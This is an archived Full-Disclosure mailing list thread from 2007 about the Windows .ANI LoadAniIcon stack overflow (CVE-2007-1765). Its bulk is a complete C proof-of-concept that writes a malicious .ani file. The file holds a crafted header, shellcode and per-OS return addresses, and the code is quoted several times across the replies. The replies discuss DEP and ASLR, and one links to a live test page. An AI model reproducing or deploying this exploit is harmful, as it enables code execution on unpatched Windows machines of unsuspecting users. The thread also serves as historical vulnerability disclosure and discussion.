Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Larry Seltzer]

>>It is completely possible to execute shellcode if we can do some DEP
bypass (ie. ret2libc attack, etc..)  

In Vista this should have problems because of ASLR, right?

I'm beginning to think that web-based attacks with this in Vista aren't
really so scary. Even if you can get them to execute what can you really
do in IE protected mode? You need to get the user to run the ANI outside
of IE. Can anyone say what actually happens if you read an e-mail in the
Vista Mail program with an attack ANI embedded?

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Larry Seltzer]

>>I tested it in Windows xp sp2 and it doesn't work.
>>Callax

Did you try turning DEP off and re-testing?

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Goodfellas Research Security Team - Callax]

Hi, 

I tested it in Windows xp sp2 and it doesn't work.

Greetings

Callax 
Shellcode Security Research Team.
Argentine

-Message d'origine-
De : [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] De la part de Larry
Seltzer
Envoyé : Domingo, 01 de Abril de 2007 01:50 p.m.
À : full-disclosure@lists.grok.org.uk
Objet : Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

>>The issue is that this only works with DEP turned off!

Interesting point. I haven't seen this mentioned anywhere, including the
Microsoft advisory
(http://www.microsoft.com/technet/security/advisory/935423.mspx).
 
Has anyone actually tested this with DEP on/off to be sure?
 
Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry_seltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Chris Lyon]

On 4/1/07, wac <[EMAIL PROTECTED]> wrote:




On 4/1/07, Larry Seltzer <[EMAIL PROTECTED]> wrote:
>
> >>The issue is that this only works with DEP turned off!
>
> Interesting point. I haven't seen this mentioned anywhere, including the
> Microsoft advisory
> ( http://www.microsoft.com/technet/security/advisory/935423.mspx).
>
> Has anyone actually tested this with DEP on/off to be sure?



Did you guys see this from the CISRT.

http://www.cisrt.org/enblog/read.php?68


Yes, winhex uses the function when you open the .ani and I don't have it

running with DEP turned on and the same goes for firefox that also leaves
the file openend when I openen  web link dev sent me (already tested winhex
with the address of exitprocess that btw seems to float around from system
to system since the version dev sent me does not works for me and it works
like a charm when I built it). I was talking with dev code about DEP
bypassing btw, we think that is possible to exploit even with >> DEP ON <<.
Just ideas for now.

Larry Seltzer
> eWEEK.com Security Center Editor
> http://security.eweek.com/
> http://blog.eweek.com/blogs/larry_seltzer/
> Contributing Editor, PC Magazine
> [EMAIL PROTECTED]
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[wac]

On 4/1/07, Larry Seltzer <[EMAIL PROTECTED]> wrote:


>>The issue is that this only works with DEP turned off!

Interesting point. I haven't seen this mentioned anywhere, including the
Microsoft advisory
(http://www.microsoft.com/technet/security/advisory/935423.mspx).

Has anyone actually tested this with DEP on/off to be sure?



Yes, winhex uses the function when you open the .ani and I don't have it
running with DEP turned on and the same goes for firefox that also leaves
the file openend when I openen  web link dev sent me (already tested winhex
with the address of exitprocess that btw seems to float around from system
to system since the version dev sent me does not works for me and it works
like a charm when I built it). I was talking with dev code about DEP
bypassing btw, we think that is possible to exploit even with >> DEP ON <<.
Just ideas for now.

Larry Seltzer

eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry_seltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[dev code]

I made a mistake in including "jmp esp" for XP SP2 because the stack cannot 
be executed (due to DEP of course :P). It is completely possible to execute 
shellcode if we can do some DEP bypass (ie. ret2libc attack, etc..) to add 
execute access to the stack and jmp to our code. My PoC i updated yesterday 
(added as an attachment to the full disclosure post) returns to 
ExitProcess()  and closes explorer.exe upon viewing the .ani file, just to 
show that it is possible to do our own shiznat in SP2.

>From: "Larry Seltzer" <[EMAIL PROTECTED]>
>To: 
>Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
>Date: Sun, 1 Apr 2007 07:49:58 -0400
>
> >>The issue is that this only works with DEP turned off!
>
>Interesting point. I haven't seen this mentioned anywhere, including the
>Microsoft advisory
>(http://www.microsoft.com/technet/security/advisory/935423.mspx).
>
>Has anyone actually tested this with DEP on/off to be sure?
>
>Larry Seltzer
>eWEEK.com Security Center Editor
>http://security.eweek.com/
>http://blog.eweek.com/blogs/larry_seltzer/
>Contributing Editor, PC Magazine
>[EMAIL PROTECTED]
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/

_
Exercise your brain! Try Flexicon. 
http://games.msn.com/en/flexicon/default.htm?icid=flexicon_hmemailtaglinemarch07

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Larry Seltzer]

>>The issue is that this only works with DEP turned off!

Interesting point. I haven't seen this mentioned anywhere, including the
Microsoft advisory
(http://www.microsoft.com/technet/security/advisory/935423.mspx).
 
Has anyone actually tested this with DEP on/off to be sure?
 
Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry_seltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[James Matthews]

The issue is that this only works with DEP turned off!

On 3/31/07, dev code <[EMAIL PROTECTED]> wrote:


I didn't include the DoS version of this, it just calls ExitProcess(). If
you have SP2, you can try going to http://sicotik.com/ink/test.html.
Thanks.

>From: wac <[EMAIL PROTECTED]>
>To: "dev code" <[EMAIL PROTECTED]>
>CC: full-disclosure@lists.grok.org.uk
>Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
>Date: Sat, 31 Mar 2007 06:53:34 -0500
>
>Hello:
>
>Does this works in *fully patched* XP pro + SP2? Mine seems to be totally
>immune (not even crashing). XP  Pro + SP2 + 0 patches crashes (probably
>landing somewhere else in memory).
>
>
>On 3/30/07, dev code <[EMAIL PROTECTED]> wrote:
>>
>>/*
>>* Copyright (c) 2007 devcode
>>*
>>*
>>*   ^^ D E V C O D E ^^
>>*
>>* Windows .ANI LoadAniIcon Stack Overflow
>>* [CVE-2007-1765]
>>*
>>*
>>* Description:
>>*A vulnerability has been identified in Microsoft Windows,
>>* which could be exploited by remote attackers to take complete
>>* control of an affected system. This issue is due to a stack
>>overflow
>>*error within the "LoadAniIcon()" [user32.dll] function when
rendering
>>*cursors, animated cursors or icons with a malformed header, which
>>could
>>* be exploited by remote attackers to execute arbitrary commands
>>by
>>*tricking a user into visiting a malicious web page or viewing an
>>email
>>*message containing a specially crafted ANI file.
>>*
>>* Hotfix/Patch:
>>*None as of this time.
>>*
>>* Vulnerable systems:
>>* Microsoft Windows 2000 Service Pack 4
>>* Microsoft Windows XP Service Pack 2
>>* Microsoft Windows XP 64-Bit Edition version 2003 (Itanium)
>>* Microsoft Windows XP Professional x64 Edition
>>* Microsoft Windows Server 2003
>>* Microsoft Windows Server 2003 (Itanium)
>>* Microsoft Windows Server 2003 Service Pack 1
>>* Microsoft Windows Server 2003 Service Pack 1 (Itanium)
>>* Microsoft Windows Server 2003 x64 Edition
>>* Microsoft Windows Vista
>>*
>>* Microsoft Internet Explorer 6
>>* Microsoft Internet Explorer 7
>>*
>>*This is a PoC and was created for educational purposes only. The
>>* author is not held responsible if this PoC does not work or is
>>* used for any other purposes than the one stated above.
>>*
>>* Notes:
>>* For this to work on XP SP2 on explorer.exe, DEP has to be
turned
>>* off.
>>*
>>*/
>>#include 
>>
>>/* ANI Header */
>>unsigned char uszAniHeader[] =
>>"\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68"
>>"\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00"
>>"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
>>"\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00"
>>"\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02"
>>"\x61\x6E\x69\x68\xA8\x03\x00\x00";
>>
>>/* Shellcode - metasploit exec calc.exe ^^ */
>>unsigned char uszShellcode[] =
>>"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
>>"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42"
>>"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32"
>>"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a"
>>"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c"
>>"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57"
>>"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50"
>>"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d"
>>"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f"
>>"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a"
>>"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76"
>>"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65"
>>"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78"
>>"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f"
>>"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65"
>>"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d"
>>"

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[dev code]

I didn't include the DoS version of this, it just calls ExitProcess(). If 
you have SP2, you can try going to http://sicotik.com/ink/test.html. Thanks.



From: wac <[EMAIL PROTECTED]>
To: "dev code" <[EMAIL PROTECTED]>
CC: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
Date: Sat, 31 Mar 2007 06:53:34 -0500

Hello:

Does this works in *fully patched* XP pro + SP2? Mine seems to be totally
immune (not even crashing). XP  Pro + SP2 + 0 patches crashes (probably
landing somewhere else in memory).


On 3/30/07, dev code <[EMAIL PROTECTED]> wrote:


/*
* Copyright (c) 2007 devcode
*
*
*   ^^ D E V C O D E ^^
*
* Windows .ANI LoadAniIcon Stack Overflow
* [CVE-2007-1765]
*
*
* Description:
*A vulnerability has been identified in Microsoft Windows,
* which could be exploited by remote attackers to take complete
* control of an affected system. This issue is due to a stack
overflow
*error within the "LoadAniIcon()" [user32.dll] function when rendering
*cursors, animated cursors or icons with a malformed header, which
could
* be exploited by remote attackers to execute arbitrary commands
by
*tricking a user into visiting a malicious web page or viewing an
email
*message containing a specially crafted ANI file.
*
* Hotfix/Patch:
*None as of this time.
*
* Vulnerable systems:
* Microsoft Windows 2000 Service Pack 4
* Microsoft Windows XP Service Pack 2
* Microsoft Windows XP 64-Bit Edition version 2003 (Itanium)
* Microsoft Windows XP Professional x64 Edition
* Microsoft Windows Server 2003
* Microsoft Windows Server 2003 (Itanium)
* Microsoft Windows Server 2003 Service Pack 1
* Microsoft Windows Server 2003 Service Pack 1 (Itanium)
* Microsoft Windows Server 2003 x64 Edition
* Microsoft Windows Vista
*
* Microsoft Internet Explorer 6
* Microsoft Internet Explorer 7
*
*This is a PoC and was created for educational purposes only. The
* author is not held responsible if this PoC does not work or is
* used for any other purposes than the one stated above.
*
* Notes:
* For this to work on XP SP2 on explorer.exe, DEP has to be turned
* off.
*
*/
#include 

/* ANI Header */
unsigned char uszAniHeader[] =
"\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68"
"\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00"
"\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02"
"\x61\x6E\x69\x68\xA8\x03\x00\x00";

/* Shellcode - metasploit exec calc.exe ^^ */
unsigned char uszShellcode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a"
"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c"
"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57"
"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50"
"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d"
"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f"
"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a"
"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76"
"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65"
"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78"
"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f"
"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65"
"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d"
"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31"
"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69"
"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61"
"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70"
"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";

char szIntro[] =
"\n\t\tWindows .ANI LoadAniIcon Stack Overflow\n"
"\t\t\tdevcode (c) 2007\n"
"[+] Targets:\n"
"\tWindows XP SP2 [0]\n"
"\tWindows 2K SP4 [1]\n\n"
"Usage: ani.exe  ";

typedef struct {
const char *szTarget;
unsigned char uszRet[5];
} TARGET;

TARGET targets[] = {
{ "Windows XP SP2", "\xC9\x29\xD4\x77" },   /* call esp */
{ "

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[wac]

Hello:

Does this works in *fully patched* XP pro + SP2? Mine seems to be totally
immune (not even crashing). XP  Pro + SP2 + 0 patches crashes (probably
landing somewhere else in memory).


On 3/30/07, dev code <[EMAIL PROTECTED]> wrote:


/*
* Copyright (c) 2007 devcode
*
*
*   ^^ D E V C O D E ^^
*
* Windows .ANI LoadAniIcon Stack Overflow
* [CVE-2007-1765]
*
*
* Description:
*A vulnerability has been identified in Microsoft Windows,
* which could be exploited by remote attackers to take complete
* control of an affected system. This issue is due to a stack
overflow
*error within the "LoadAniIcon()" [user32.dll] function when rendering
*cursors, animated cursors or icons with a malformed header, which
could
* be exploited by remote attackers to execute arbitrary commands
by
*tricking a user into visiting a malicious web page or viewing an
email
*message containing a specially crafted ANI file.
*
* Hotfix/Patch:
*None as of this time.
*
* Vulnerable systems:
* Microsoft Windows 2000 Service Pack 4
* Microsoft Windows XP Service Pack 2
* Microsoft Windows XP 64-Bit Edition version 2003 (Itanium)
* Microsoft Windows XP Professional x64 Edition
* Microsoft Windows Server 2003
* Microsoft Windows Server 2003 (Itanium)
* Microsoft Windows Server 2003 Service Pack 1
* Microsoft Windows Server 2003 Service Pack 1 (Itanium)
* Microsoft Windows Server 2003 x64 Edition
* Microsoft Windows Vista
*
* Microsoft Internet Explorer 6
* Microsoft Internet Explorer 7
*
*This is a PoC and was created for educational purposes only. The
* author is not held responsible if this PoC does not work or is
* used for any other purposes than the one stated above.
*
* Notes:
* For this to work on XP SP2 on explorer.exe, DEP has to be turned
* off.
*
*/
#include 

/* ANI Header */
unsigned char uszAniHeader[] =
"\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68"
"\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00"
"\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02"
"\x61\x6E\x69\x68\xA8\x03\x00\x00";

/* Shellcode - metasploit exec calc.exe ^^ */
unsigned char uszShellcode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a"
"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c"
"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57"
"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50"
"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d"
"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f"
"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a"
"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76"
"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65"
"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78"
"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f"
"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65"
"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d"
"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31"
"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69"
"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61"
"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70"
"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";

char szIntro[] =
"\n\t\tWindows .ANI LoadAniIcon Stack Overflow\n"
"\t\t\tdevcode (c) 2007\n"
"[+] Targets:\n"
"\tWindows XP SP2 [0]\n"
"\tWindows 2K SP4 [1]\n\n"
"Usage: ani.exe  ";

typedef struct {
const char *szTarget;
unsigned char uszRet[5];
} TARGET;

TARGET targets[] = {
{ "Windows XP SP2", "\xC9\x29\xD4\x77" },   /* call esp */
{ "Windows 2K SP4", "\x29\x4C\xE1\x77" }
};

int main( int argc, char **argv ) {
char szBuffer[1024];
FILE *f;

if ( argc < 3 ) {
printf("%s\n", szIntro );
return 0;
}

printf("[+] Creating ANI header...\n");
memset( szBuffer, 0x90, sizeof( szBuffer ) );
memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 );

printf("[+] Copying shellcode...\n");
memcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 );
memcpy( szBuffer + 192, uszShellcode, sizeof( uszShellcode ) - 1
);

printf("%s\n", argv[2] );
f = fopen( argv[2], "wb" );
if ( f == NULL ) {
printf("[-] Cannot create file\n");
return 0;

[Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[dev code]

/*
* Copyright (c) 2007 devcode
*
*
*   ^^ D E V C O D E ^^
*
* Windows .ANI LoadAniIcon Stack Overflow
* [CVE-2007-1765]
*
*
* Description:
*A vulnerability has been identified in Microsoft Windows,
* which could be exploited by remote attackers to take complete
* control of an affected system. This issue is due to a stack overflow
*error within the "LoadAniIcon()" [user32.dll] function when rendering
*cursors, animated cursors or icons with a malformed header, which could
* be exploited by remote attackers to execute arbitrary commands by
*tricking a user into visiting a malicious web page or viewing an email
*message containing a specially crafted ANI file.
*
* Hotfix/Patch:
*None as of this time.
*
* Vulnerable systems:
* Microsoft Windows 2000 Service Pack 4
* Microsoft Windows XP Service Pack 2
* Microsoft Windows XP 64-Bit Edition version 2003 (Itanium)
* Microsoft Windows XP Professional x64 Edition
* Microsoft Windows Server 2003
* Microsoft Windows Server 2003 (Itanium)
* Microsoft Windows Server 2003 Service Pack 1
* Microsoft Windows Server 2003 Service Pack 1 (Itanium)
* Microsoft Windows Server 2003 x64 Edition
* Microsoft Windows Vista
*
* Microsoft Internet Explorer 6
* Microsoft Internet Explorer 7
*
*This is a PoC and was created for educational purposes only. The
* author is not held responsible if this PoC does not work or is
* used for any other purposes than the one stated above.
*
* Notes:
* For this to work on XP SP2 on explorer.exe, DEP has to be turned
* off.
*
*/
#include 

/* ANI Header */
unsigned char uszAniHeader[] =
"\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68"
"\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00"
"\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02"
"\x61\x6E\x69\x68\xA8\x03\x00\x00";

/* Shellcode - metasploit exec calc.exe ^^ */
unsigned char uszShellcode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a"
"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c"
"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57"
"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50"
"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d"
"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f"
"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a"
"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76"
"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65"
"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78"
"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f"
"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65"
"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d"
"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31"
"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69"
"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61"
"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70"
"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";

char szIntro[] =
"\n\t\tWindows .ANI LoadAniIcon Stack Overflow\n"
"\t\t\tdevcode (c) 2007\n"
"[+] Targets:\n"
"\tWindows XP SP2 [0]\n"
"\tWindows 2K SP4 [1]\n\n"
"Usage: ani.exe  ";

typedef struct {
const char *szTarget;
unsigned char uszRet[5];
} TARGET;

TARGET targets[] = {
{ "Windows XP SP2", "\xC9\x29\xD4\x77" },   /* call esp */
{ "Windows 2K SP4", "\x29\x4C\xE1\x77" }
};

int main( int argc, char **argv ) {
char szBuffer[1024];
FILE *f;

if ( argc < 3 ) {
printf("%s\n", szIntro );
return 0;
}

printf("[+] Creating ANI header...\n");
memset( szBuffer, 0x90, sizeof( szBuffer ) );
memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 );

printf("[+] Copying shellcode...\n");
memcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 );
memcpy( szBuffer + 192, uszShellcode, sizeof( uszShellcode ) - 1 );

printf("%s\n", argv[2] );
f = fopen( argv[2], "wb" );
if ( f == NULL ) {
printf("[-] Cannot create file\n");
return 0;
}

fwrite( szBuffer, 1, 1024, f );
fclose( f );
printf("[+] .ANI file succesfully created!\n");
return 0;
}

_
Interest Rates near 39yr lo